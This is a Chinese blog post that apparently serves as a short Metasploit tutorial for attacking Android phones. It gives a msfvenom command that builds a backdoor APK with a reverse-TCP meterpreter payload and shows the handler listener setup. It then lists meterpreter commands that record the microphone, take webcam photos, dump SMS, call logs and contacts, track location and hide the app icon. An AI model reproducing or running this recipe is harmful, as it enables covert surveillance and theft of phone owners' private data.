MSF - Android

最新推荐文章于 2024-07-15 11:49:34 发布
最新推荐文章于 2024-07-15 11:49:34 发布
阅读量811 收藏 5
点赞数 1
分类专栏: Metasploit 文章标签: MSF Metasploit Android 渗透测试 ShenMian
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ShenMian000/article/details/82941825
版权

更新中

生成后门

msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地IP> LPORT=<监听Port> R -o backdoor.apk

当目标执行后门时,MSF会向后门发送Payload。当Payload载入后即可开始控制目标。

开启监听任务

msf > use use exploit/multi/handler
msf exploit(multi/handler) > set LOHOST <本地IP>
LHOST => 127.0.0.1
msf exploit(multi/handler) > set LPORT <监听Port>
LPORT => 25565
msf exploit(multi/handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit -j

record_mic

录音

webcam_snap

摄像

dump_calllog

导出并下载通话记录

dump_sms

导出并下载短信记录

dump_contacts

导出并下载通讯录

geolocate

获取地理位置

meterpreter > geolocate  
 [*] Current Location: 
  Latitude:  XX.XXXXX
  Longitude: XXX.XXXXXX
 
 To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=XX.XXXXX,XXX.XXXXXX&sensor=true

清楚的显示了设备的GPS信息,并且提供了一条Google API。

hide_app_icon

隐藏APP图标

send_sms

发送短信

wakelock

开关Wakelock锁

check_root

检查设备是否被ROOT

meterpreter > check_root  
[+] Device is rooted

可以看出该设备已被ROOT

ShenMian000
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msf渗透手机(操作手机系统)
xss2001999的博客
11-09 494
msf渗透智能手机(安卓系统)
msf使用木马控制android手机
my_name_is_sy的博客
05-18 2314
使用msfvenom生成木马控制手机
MSF渗透Android
Yxisobai的博客
05-28 1185
kali linux 云服务器,云服务器安装kali linux网络软件不要乱下载,自己做测试的时候没做免杀手机能监测出病毒,但是被有心之人利用,通过捆绑,免杀等一系列操作,还是很难发现的。特别注意一下外挂等软件,xx助手等软件
旧版 Android 系统为目标平台的应用的警告
EnzoChan的专栏
04-24 2778
1.问题呈现: 在Android10.0中运行应用会提示“此应用专为旧版Android打造,可能无法正常运行,请尝试更新或与开发者联系”。 具体截图如下: 为什么在Android10.0会出现这个提示,而在低版本中却没有呐? 2.问题分析 我们可以在官方网站中的Android10.0版本中的影响应用的行为变更中找到答案。 可以看出是项目中配置targetSdkVersion的影响。...
黑客常用的工具之---MSF的使用(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
07-15 1020
MSF默认存放模块的目录如下。
渗透工具——kali中msf简介(以及MSF的基本使用方法)
2301_78006725的博客
09-02 7395
设置payload:set payload windows/x64/meterpreter/reverse_tcp。1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue。设置模块:use auxiliary/scanner/smb/smb_ms17_010。攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。设置目标地址:set RHOSTS [目标地址]
内网渗透 MetasploitMSF)基础使用
qq_49433473的博客
10-24 1万+
内网渗透 MetasploitMSF)使用,信息搜集,模块详解,端口扫描,反弹shell
msf相关讲解
weixin_46476861的博客
01-22 1万+
Metasploit就是一个安全漏洞检测工具。它的全称叫做The Metasploit Framework,简称MSFmsf专业术语: 1 渗透攻击(Exploit) 攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。 2 攻击载荷(Payload) 目标系统在被渗透攻击后而执行的代码。在MSF框架中可以自由的选择、传送和植入。 3 溢出代码(Shellcode) 渗透攻击时作为攻击载荷运行的一组机器指令。shellcode通常用汇编语言编写。 4 模块(Module) 在MSF
multiscreen-android
06-25
将/dist/android-msf-api-2.xxjar复制到您的 libs 文件夹并正常链接。 支持 Eclipse 或 Android Studio 项目。 笔记: /dist/android-msf-api-lite-2.xxjar jar 包含没有必要依赖项的 MultiScreen SDK API。 文档 ...
android ContentProviders
11-17
Android中的ContentProviders是Android平台用来提供不同类型数据(比如音频、视频、图片、个人联系人等)的一个统一接口。ContentProviders使用URI(统一资源标识符)来识别数据集,并允许一个应用程序存储和检索...
m-wiz
03-07
此工具可在根目录为Android的设备和非根目录为Android的设备上使用。适用于: Termux测试于: Termux要求 : 互联网600 MB 外部存储权限储存1Gb 1GB内存特征 : [+]安装Metasploit! [+]更新维护! [+]易于初学者!...
移动端渗透测试框架MSF
09-24
移动安全框架MSF(Mobile Security Framework - MobSF)是一个全面的、开源的渗透测试和安全分析平台,专门针对移动应用,如Android和iOS应用程序。它为安全专家提供了自动化静态和动态分析工具,帮助他们在开发周期...
halogenOS Builds by MSF Jarvis:于云妮(YU Yunique)的卤素OS版本-开源
04-26
卤素OS,又名HalogenOS,是一款基于Android开源项目(AOSP)的第三方定制操作系统,专注于提供流畅、快速且个性化的用户体验。标题中的“MSF Jarvis”可能是开发者或团队的名称,他们为云妮(YU Yunique)这款设备...
MSF 详解
m0_72125469的博客
05-19 4528
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。
MSF使用详解
m0_52051132的博客
10-19 8007
一、 Meterpreter是什么Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。
一、初识Metasploit(MSF使用详解超详细)
qq_59235193的博客
01-27 2983
模块名称模块作用Auxiliary负责执行信息收集,扫描,嗅探,指纹识别,口令猜测和Dos攻击等功能的辅助模块Exploits利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动,被动)Payloads成功exploit之后,真正在目标系统执行的代码和命令。Post后期渗透模块,在取得目标系统远程控制权后吗,进行一系列的后渗透攻击动作,如获取敏感信息,跳板攻击等操作.Encoders对payload进行加密,躲避antiviru检查的模块。Nops。
MSF的使用教程
热门推荐
hackzkaq的博客
10-18 3万+
公众号:白帽子左一 MSF简介 MetasploitMSF)是一个免费的、可下载的框架 它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。 因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。 也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所.
MSF(Metasploit Framework)详细介绍及用法【新手篇】
h1008685的博客
04-04 3751
MSF核心组件介绍,MSF常用模块介绍【exploit,payload,auxiliary,post-exploitation,encoder,nops,evasion】基础命令【启动msf,数据库管理,查找和使用模块,配置模块,执行模块 ,会话管理,辅助命令,系统命令】MSf初始配置【初始化数据库,创建/切换/删除工作区,扫描数据,查看扫描结果】
渗透测试-MSF工具使用简介及命令使用漏洞利用过程
XLbb的博客
05-08 2718
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSFMetasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件msfconsole; 如:测试编号为cve-2019-0708 的漏洞(windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具。
在什么场景下可利用MSF攻击android
06-10
Android系统上,可以使用MSF来进行渗透测试,以发现系统中的漏洞和弱点。 在实际应用中,可以利用MSF来执行以下攻击: 1. 利用已知的Android漏洞进行攻击,例如利用Android系统中的漏洞来执行代码,获取系统权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值